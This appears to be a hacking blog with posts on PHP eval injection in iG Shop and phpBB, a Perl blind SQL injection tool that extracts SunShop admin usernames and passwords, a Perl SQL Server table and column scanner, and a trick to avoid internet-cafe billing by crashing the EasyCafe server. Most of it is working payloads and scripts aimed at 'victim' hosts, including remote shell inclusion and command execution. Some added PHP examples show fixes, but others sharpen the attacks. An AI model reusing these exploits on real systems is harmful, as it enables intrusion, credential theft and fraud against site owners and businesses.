20 May 2008

PHP injection in phpBB and iG Shop

iG Shop and phpBB are not from the same vendor.
iG shop : http://www.igeneric.co.uk/ig-shopping-cart.html
phpbb : http://www.phpbb.com
What the two PHP scripts have in common is that both are open source.
The other thing they share is that earlier versions of each have had a PHP injection hole.

PHP injection here does not mean what is usually called RFI, LFI or SQL injection.
PHP injection here means that we can put PHP statements into the target URL and the script runs them, because user input ends up inside a string that is handed to eval() (or to an equivalent such as preg_replace() with the /e modifier).


---------------
| iG Shop 1.0 |
---------------


The PHP injection vuln in iG Shop is in page.php and cart.php, where an eval() call interpolates a variable that is not properly filtered ( http://milw0rm.com/exploits/3083 ).

cart.php, line 692:
eval ("cart_$action();");

page.php, line 336:
eval ("page_$action();");

In both files $action comes straight from the request without proper filtering, so whatever we put in the URL is compiled and run by eval(). The payloads below end the intended call early: page_exit / cart_exit is read as a bare constant name, the string operator (.) starts a new expression in which our own statement sits, and the trailing exit (which picks up the () that eval() appends) stops the script before the real page code runs.

By injecting this way we can get shell access by including a remote r57 or c99 shell:
page.php?action=exit.include($_GET[cok]);exit&cok=[shell]
cart.php?action=exit.include($_GET[cok]);exit&cok=[shell]

With this injection we can read important files on the host:
page.php?action=exit.show_source($_GET[cok]);exit&cok=page.php
cart.php?action=exit.show_source($_GET[cok]);exit&cok=page.php

With this injection we can run shell commands from the URL:
page.php?action=exit.passthru($_GET[cok]);exit&cok=uname -a
cart.php?action=exit.passthru($_GET[cok]);exit&cok=id

Other PHP functions such as fopen(), readfile() and so on can be tried in the same way.
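As an added example (this is not iG Shop's code), here is the eval() dispatch pattern from page.php and cart.php next to a whitelisted dispatch, exercised with a harmless payload of the same shape as the ones above. The handler names page_index and page_view and the payload itself are assumptions chosen so the script runs on current PHP, where the page's exit. trick no longer works because an undefined constant has been a fatal Error since PHP 8.0.

```php
<?php
// Added example (not iG Shop's code): the eval() dispatch from page.php/cart.php
// beside a whitelisted dispatch. page_index/page_view and the payload are
// assumptions made up for this demo.

function page_index() { echo "[index page]\n"; }
function page_view()  { echo "[view page]\n"; }

// Vulnerable form, as in page.php line 336: $action is pasted into the source
// string that eval() compiles, so anything after a valid prefix becomes PHP.
function dispatch_vulnerable(string $action): void {
    eval("page_$action();");
}

// Hardened form: only a known action name can reach a function call, the name is
// looked up in a fixed table and never compiled, and anything else is rejected.
function dispatch_safe(string $action): bool {
    $allowed = ['index' => 'page_index', 'view' => 'page_view'];
    if (!isset($allowed[$action])) {
        return false;                 // unknown or tampered action
    }
    $allowed[$action]();              // call through the table, no eval()
    return true;
}

// The injection: the prefix still forms a real call (page_index()), ';' ends that
// statement, our own statement follows, and '//' comments out the '();' that
// eval() appends. The page's payloads use 'exit.' for the same effect on PHP 4/5:
// page_exit is read as a bare constant and '.' starts a new expression.
$payload = "index();echo '[injected: ' . php_uname('s') . \"]\\n\";//";

dispatch_vulnerable($payload);        // prints [index page] and then the injected line
var_dump(dispatch_safe($payload));    // bool(false): rejected before any call
var_dump(dispatch_safe('view'));      // prints [view page], then bool(true)
```

The lookup table is the whole fix: the request can choose between known handlers but can never contribute characters to the code that runs. A regex such as ctype_alnum() on $action would also stop these payloads, but it still leaves a string on its way into eval(), which is the pattern to remove rather than guard.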


-----------------------------------------
| copyright : (C) 2001 The phpBB Group |
-----------------------------------------

The phpBB vuln is in viewtopic.php. The highlight parameter is decoded and split as shown below without any filtering that would reject a quote, and the resulting words are later interpolated into a preg_replace() call that uses the /e modifier, so a quote that survives the chain lets arbitrary PHP be evaluated. The two relevant lines are:

explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
$highlight = urlencode($HTTP_GET_VARS['highlight']);

The trick is to send the single quote double URL-encoded (%2527) together with the string operator (.). The web server decodes %2527 once, to %27, which contains no quote and so passes magic_quotes_gpc (addslashes) and htmlspecialchars() untouched; the script's own urldecode() then turns it into a literal ', and the dot splices our PHP into the surrounding code:

viewtopic.php?p=15&highlight=%2527.show_source($_GET[file]),exit.%2527&file=viewtopic.php
viewtopic.php?p=15&highlight=%2527.include($_GET[file]),exit.%2527&file=[shell]
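Added example, not phpBB's code: the two viewtopic.php lines above applied to three spellings of a single quote, behind a simulated web-server decode and magic_quotes_gpc (addslashes()) stage, to show which spelling arrives intact. htmlspecialchars() is called with ENT_COMPAT written out because that was the PHP 4/5 default (single quotes are left alone); PHP 8.1 switched the default to ENT_QUOTES. The highlight_words_safe() hardening at the end is my example, not phpBB's actual patch.

```php
<?php
// Added example, not phpBB's code. Shows what reaches the two viewtopic.php
// lines for three spellings of a single quote typed into the URL. The server
// decode and magic_quotes_gpc stages are assumptions modelled on a 2004-era setup.

// Stage 1+2: the server decodes the query string once, then magic_quotes_gpc
// runs addslashes() on every GET value.
function simulate_gpc(string $typed_in_url): string {
    return addslashes(urldecode($typed_in_url));
}

// Stage 3: the phpBB line, with ENT_COMPAT written out (the PHP 4/5 default,
// which leaves single quotes alone; PHP 8.1 changed the default to ENT_QUOTES).
function phpbb_highlight_words(string $highlight): array {
    return explode(' ', trim(htmlspecialchars(urldecode($highlight), ENT_COMPAT)));
}

// First highlight word phpBB would build for each spelling of the quote.
function probe(): array {
    $out = [];
    foreach (["'", "%27", "%2527"] as $typed) {
        $out[$typed] = phpbb_highlight_words(simulate_gpc($typed))[0];
    }
    return $out;
}

// Example hardening (mine, not phpBB's patch): decode, then keep only word
// characters and spaces, so nothing that can close a string or a regex survives.
function highlight_words_safe(string $highlight): array {
    $clean = preg_replace('/[^\w ]+/', '', urldecode($highlight));
    return array_values(array_filter(explode(' ', trim($clean)), 'strlen'));
}

foreach (probe() as $typed => $word) {
    printf("%-6s -> [%s]\n", $typed, $word);
}
// '      -> [\']   magic quotes escaped it
// %27    -> [\']   decoded once by the server, then escaped
// %2527  -> [']    arrives as %27, nothing for addslashes() to see, decoded by phpBB's own urldecode()

print_r(highlight_words_safe('%2527.show_source($_GET[file]),exit.%2527'));
// Array ( [0] => 27show_source_GETfileexit27 )
```

The general lesson from the probe is that a decode step placed after the escaping step undoes the escaping; the fix is to decode first and filter last, and to keep user input out of any string that is later compiled (the /e modifier was removed from PHP 7 for exactly this reason).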


08 May 2008

SunShop Version 3.5.1 Blind SQL Injection

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
# script : SunShop Version 3.5.1 Remote Blind SQL Injection
# script site : http://www.turnkeywebtools.com/sunshop/
# Discovered
# By : irvian
# site : http://irvian.cn
# email : irvian.info@gmail.com


print "\r\n[+]-----------------------------------------[+]\r\n";
print "[+]Blind SQL injection [+]\r\n";
print "[+]SunShop Version 3.5.1 [+]\r\n";
print "[+]code by irvian [+]\r\n";
print "[+]special : ifx, arioo, jipank, bluespy [+]\r\n";
print "[+]-----------------------------------------[+]\r\n";
if (@ARGV < 5){
die "

Usage : perl $0 host option id table itemid

Arguments
host : http://victim.com
option : 1 to extract the username, 2 to extract the password
id : value of the id column of the row to read, usually 1, 2, 3 and so on
table : name of the admin table, usually admin or ss_admin
itemid : id of an existing product, i.e. a value that works in index.php?action=item&id=
Example : perl $0 http://www.underhills.com/cart 1 1 admin 10
\n";}


my $url = $ARGV[0];
my $option = $ARGV[1];
my $id = $ARGV[2];
my $tabel = $ARGV[3];
my $itemid = $ARGV[4];

if ($option eq 1){
syswrite(STDOUT, "username: ", 10);}
elsif ($option eq 2){
syswrite(STDOUT, "password: ", 10);}

# Read up to 32 characters, one position at a time. For each position the
# candidates are tried linearly: first ASCII 32..57 (space, punctuation and
# digits), then 97..122 (lowercase letters), which is enough for a lowercase
# hex hash. Uppercase letters and every other character outside those two
# ranges are never tried, so such a position is silently skipped.
for(my $i = 1; $i <= 32; $i++){
my $f = 0;
my $n = 32;
while(!$f && $n <= 57)
{
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
if ($f==0){
$n = 97;
while(!$f && $n <= 122)
{
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
}
}
print "\n[+]finish Execution Exploit\n";

# One oracle request: is character $i of the requested column equal to chr($n)?
# The product id is closed with a quote, the SUBSTRING comparison is ANDed on,
# and /* comments out the rest of the original query. A true condition leaves
# the product page intact; a false one makes SunShop answer
# "This product is currently not viewable".
sub blind {
my $site = $_[0];
my $op = $_[1];
my $id = $_[2];
my $tbl = $_[3];
my $i = $_[4];
my $n = $_[5];
my $item = $_[6];

my $klm;
if ($op eq 1){
$klm = "username";
}
elsif ($op eq 2){
$klm = "password";
}
my $ua = LWP::UserAgent->new;
my $url = "$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=CHAR("."$n".")/*";
my $res = $ua->get($url);
my $browser = $res->content;
if ($browser !~ /This product is currently not viewable/i){
return 1;
}
else {
return 0;
}

}
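Added example, not the page's Perl script: the same boolean oracle driven by a binary search over ASCII(SUBSTRING(...)). It reads any byte value in at most 8 requests per character and stops at the end of the string, where the linear scan above spends up to 52 requests per position and only covers digits, some punctuation and lowercase letters. The HTTP request is replaced by a constructed in-memory row (FAKE_ROW) and an oracle() function with the same true/false meaning as the "This product is currently not viewable" check; the table and column names follow the page, the row contents are made up.

```php
<?php
// Added example, not the page's tool. The oracle is simulated: FAKE_ROW stands
// in for the SELECT, and oracle() answers what the product page would reveal.

// Constructed sample row: what SELECT username/password FROM ss_admin WHERE id=1 returns.
const FAKE_ROW = ['username' => 'Admin_01', 'password' => '5f4dcc3b5aa765d9'];

// Stand-in for one HTTP request "id=<item>' AND <condition>/*": true when the
// condition holds and the product stays visible, false when the page says
// "This product is currently not viewable". Evaluated on FAKE_ROW instead.
function oracle(string $column, int $pos, string $op, int $value): bool {
    $s = FAKE_ROW[$column];
    $code = $pos <= strlen($s) ? ord($s[$pos - 1]) : 0;  // SUBSTRING past the end is '' -> ASCII() gives 0
    return $op === '>' ? $code > $value : $code === $value;
}

// The SQL fragment a live run would append for one probe (ASCII() wrapped
// around the page's SUBSTRING() so that '>' comparisons are possible).
function injected_condition(string $column, string $table, int $id, int $pos, string $op, int $value): string {
    return "ASCII(SUBSTRING((SELECT $column FROM $table WHERE id=$id),$pos,1))$op$value";
}

// Binary search one byte: at most 8 oracle calls for the range 0..255.
function extract_char(string $column, int $pos): int {
    $lo = 0; $hi = 255;
    while ($lo < $hi) {
        $mid = intdiv($lo + $hi, 2);
        if (oracle($column, $pos, '>', $mid)) { $lo = $mid + 1; } else { $hi = $mid; }
    }
    return $lo;
}

// Read characters until ASCII 0, i.e. until SUBSTRING() runs past the value.
function extract_value(string $column, int $max = 64): string {
    $out = '';
    for ($pos = 1; $pos <= $max; $pos++) {
        $c = extract_char($column, $pos);
        if ($c === 0) { break; }
        $out .= chr($c);
    }
    return $out;
}

echo "username: ", extract_value('username'), "\n";   // Admin_01: the 'A' and '_' are outside the linear scan's ranges
echo "password: ", extract_value('password'), "\n";   // 5f4dcc3b5aa765d9
echo "probe: ", injected_condition('password', 'ss_admin', 1, 1, '>', 127), "\n";
```

On a live target each oracle() call is one GET of index.php?action=item&id=<item>' AND <condition>/*, so the request count, not the character set, is what limits the attack. On the application side the cause is the id value being concatenated into the query; casting it to an integer or binding it as a prepared-statement parameter removes the oracle entirely.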

Weakness in Tinasoft's EasyCafe billing

This tip was tested successfully on EasyCafe billing version 2.2.14.

Background.
A few friends suggested I use the EasyCafe billing software from Tinasoft,
which they said was good and stable in their own internet cafe. Being very
curious, I tried installing it.
They were right: EasyCafe is rich in features and very complete.



Problem.
When the power went out, the computers I had set up as the EasyCafe client and
server shut down by themselves, and when the power came back
I started the server and the client again.
To my surprise, there was no record of the client's usage in the server's log.

Conclusion.
If the EasyCafe server and the client both go down, the client usage log data is lost.

Beware.
From the story and the conclusion above, it is possible to use an internet cafe that runs EasyCafe as its billing system for free.
Go into the cafe and use a computer as usual. When you have had enough,
try to make the billing server crash, hang, reboot or shut down.
There are plenty of ways to do that, such as Windows exploits and bugs, DoS, or perhaps social engineering.
Once you are sure the billing server is in one of the states above, immediately power off the computer you are using with its on/off button, or just pull the power cable and plug it back in.
When the billing server is back to normal, your usage will no longer be recorded in its log.





06 May 2008

CFM table and column scanner

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
# helper tool for the article "Playing with SQL injection on CFM targets"
# enjoy :D
# comments and suggestions: irvian.info@gmail.com


print "[*]---------------------------------[*]\r\n";
print "[*] DATABASE INJECTOR [*]\r\n";
print "[*] TYPE DATABASE [*]\r\n";
print "[*] SQL SERVER [*]\r\n";
print "[*] created by irvian [*]\r\n";
print "[*]---------------------------------[*]\r\n";

unless ($ARGV[0] and $ARGV[1]){
print "\nuse:$0 \"http://victim.com/query?patch=1\" scan\r\n";
print "replace scan with a table name to list the columns of that table\r\n";
exit;
}

my $host = $ARGV[0];
my $tbl = $ARGV[1];
# the scanner speaks plain HTTP only: rewrite https:// and add a missing scheme
if ($host =~ /^https:\/\//i){
$host = "http://".$';}
if ($host !~ /^http:\/\//i){
$host = "http://".$ARGV[0];}
# keep the URL up to and including the "=" of the injectable parameter;
# every payload is appended right after it
if ($host =~ /(.*)\/(.*)\?(.*)=/i){
$host = $&;}
else{
die "Wrong URL, check the path or the query variable\n";}
# a stray quote after the value provokes a database error that names the backend
my $url = $host."1'";

my $ua = LWP::UserAgent->new() or die "Could not initialize browser\n";
$ua->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
my $res = $ua->request(HTTP::Request->new(GET=>$url));
my $browser = $res->content;

print "Detection Database.....\r\n";
sleep (2);

if ($browser =~ /JET Database/i){
die "Program Can't Work On Database Microsoft Jet\n"}

elsif ($browser =~ /Microsoft Access/i){
die "Program Can't Work On Database Microsoft Access\n";}

elsif ($browser =~ /MYSQL/i){
die "Program Can't Work On Database MYSQL\n";}

#SQL SERVER
elsif ($browser =~ /SQL Server|SQLServer/i){
print "Database SQL Server\r\n";
my $n=1;
# SQL list of the names already seen; starts with the empty string ''
my $found="''";
if ($tbl eq "scan") {
print "Scan All Table....\r\n";
# Each request selects the first table name not yet seen and converts it to
# int. The conversion fails and SQL Server echoes the name back in the error
# message ("... converting the nvarchar value 'name' ..."), which is the
# extraction channel. Each name found is appended to the NOT IN list.
while (1)
{
$url = "$host"."convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN($found)))--";
$res = $ua->request(HTTP::Request->new(GET=>$url));
$browser = $res->content;
last unless $browser =~ /converting the nvarchar value '(.+)'/i;
my $name = $1;
print "Table $n: $name\n";
$found .= ",".to_char_concat($name);
$n++;
}
if ($n != 1) {
print "Total Table : ".($n-1)."\n";exit;}
else {
die "Table Not found!\n";
}
}
else {
print "Scan All Column on Table $tbl\r\n";
# the table name goes in as char()+char()+... so the query needs no quotes
my $tbl_enc = to_char_concat($tbl);
while (1)
{
$url = "$host"."convert(int,(SELECT%20TOP%201%20COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=$tbl_enc%20AND%20COLUMN_NAME%20NOT%20IN%20($found)))--";
$res = $ua->request(HTTP::Request->new(GET=>$url));
$browser = $res->content;
last unless $browser =~ /converting the nvarchar value '(.+)'/i;
my $name = $1;
print "Column $n: $name\n";
$found .= ",".to_char_concat($name);
$n++;
}
if ($n != 1) {
print "Total Column : ".($n-1)."\n";exit;}
else {
die "Column NOT found!\n";
}
}
}

else {
die "Injection Not Work in Victim\n";}

#created by irvian

# Rewrite a string as char(n)+char(n)+... so it can be used in the injected
# query without any quote character (the + is sent URL-encoded as %2b, since a
# raw + in a query string would be decoded to a space). The original 224-entry
# lookup table produced the same output; it is computed from the character
# code here.
sub to_char_concat{
my $str = $_[0];
return join("%2b", map { sprintf("char(%d)", ord($_)) } split(//, $str));
}

#write by irvian
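Added example, not the page's Perl tool: the convert(int,(SELECT TOP 1 ... NOT IN (...))) loop written once as a generic routine and then used for tables, columns and, going one step beyond the scanner, the rows of a chosen column. The tiny in-memory schema (FAKE_DB) and the fake_server() responder stand in for the ColdFusion page and SQL Server; the error text is the real SQL Server 2000 wording, the data is made up. It also shows the one case where this channel goes quiet: a value that converts to int cleanly raises no error and is never echoed back.

```php
<?php
// Added example, not the page's tool. PHP 8 (match, arrow functions).
// FAKE_DB and fake_server() are constructed stand-ins for the target.

const FAKE_DB = [
    'ss_admin' => [['id' => 1, 'username' => 'admin'], ['id' => 2, 'username' => 'editor']],
    'products' => [['id' => 10, 'name' => 'lamp']],
];

// Encode a string as char(n)+char(n)+... so the query needs no quote characters
// (the same idea as the scanner's lookup table).
function to_char_concat(string $s): string {
    return implode('+', array_map(fn($c) => sprintf('char(%d)', ord($c)), str_split($s)));
}

// Fake SQL Server behind a CFM page: the first candidate not yet excluded is
// what TOP 1 ... NOT IN would return. A non-numeric value fails the int
// conversion and is leaked in the error; a numeric one converts fine, so the
// page renders normally and the channel falls silent.
function fake_server(string $what, string $table, string $column, array $seen): string {
    $candidates = match ($what) {
        'tables'  => array_keys(FAKE_DB),
        'columns' => array_keys(FAKE_DB[$table][0] ?? []),
        'rows'    => array_map(fn($r) => (string)$r[$column], FAKE_DB[$table] ?? []),
    };
    foreach ($candidates as $v) {
        if (in_array($v, $seen, true)) { continue; }
        if (is_numeric($v)) { return "<html>product page</html>"; }
        return "Syntax error converting the nvarchar value '$v' to a column of data type int.";
    }
    return "<html>product page</html>";
}

// The payload as the scanner would append it after the '=' of the injectable
// parameter; only the inner SELECT differs per target.
function payload(string $what, string $table, string $column, string $notIn): string {
    $inner = match ($what) {
        'tables'  => "SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN($notIn)",
        'columns' => "SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="
                     . to_char_concat($table) . " AND COLUMN_NAME NOT IN($notIn)",
        'rows'    => "SELECT TOP 1 $column FROM $table WHERE $column NOT IN($notIn)",
    };
    return "convert(int,($inner))--";
}

// The generic loop: request the first value not yet seen until no error comes back.
function enumerate(string $what, string $table = '', string $column = ''): array {
    $seen = []; $notIn = "''";
    while (true) {
        $q = payload($what, $table, $column, $notIn);          // live target: $body = GET $host . $q
        $body = fake_server($what, $table, $column, $seen);   // stand-in for that response
        if (!preg_match("/converting the nvarchar value '(.+)'/i", $body, $m)) { break; }
        $seen[] = $m[1];
        $notIn .= ',' . to_char_concat($m[1]);
    }
    return $seen;
}

print_r(enumerate('tables'));                         // ss_admin, products
print_r(enumerate('columns', 'ss_admin'));            // id, username
print_r(enumerate('rows', 'ss_admin', 'username'));   // admin, editor
print_r(enumerate('rows', 'ss_admin', 'id'));         // empty: numeric ids convert cleanly, nothing leaks
echo payload('columns', 'ss_admin', '', "''"), "\n";
```

When a payload goes into a real URL, '+' must be sent as %2b and spaces as %20 (which is why the scanner hard-codes %2b), otherwise the web server turns the '+' of the char() concatenation into a space and the query breaks. For numeric columns the error channel shown here is useless; the usual way round is to force the error with a string, for example by concatenating a letter onto the value inside the SELECT, so the conversion fails and the value is echoed along with it.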

#write by irvian


Read more...

powered by irvian